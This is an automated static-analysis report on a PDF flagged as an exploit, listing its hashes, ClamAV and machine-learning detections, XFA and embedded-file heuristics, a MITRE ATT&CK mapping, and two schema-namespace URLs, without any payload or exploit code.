Malicious PDF — malware analysis report

Static analysis result for SHA-256 f32b8b7855ccfbb1…

MALICIOUS

PDF

6.4 KB
MD5: e967f834f89ae46a2c34073d50d3e8fc SHA-1: 1913c78971792af27ae05003f88e8d8618769e6d SHA-256: f32b8b7855ccfbb182afac31ac645f843fcfca949a745115d0d8e5de77c3e185
106 Risk Score

Malware Insights

MITRE ATT&CK
T1204 Malicious Link T1204.002 Malicious Link: Malicious File

The file is a PDF document identified by ClamAV as Pdf.Exploit.Agent-6136306-0, indicating it contains an exploit. The ML classifier also flagged it with high confidence. While the document body content is obfuscated and difficult to interpret, the presence of embedded URLs and the XFA form structure suggest an attempt to leverage these features for exploitation. The primary attack pattern involves exploiting a PDF vulnerability to execute a payload.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9974

Heuristics 4

  • ClamAV: Pdf.Exploit.Agent-6136306-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-6136306-0
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xdp/
    • http://www.xfa.org/schema/xfa-template/2.5/

Open this report in the interactive analyzer, or submit your own file for analysis.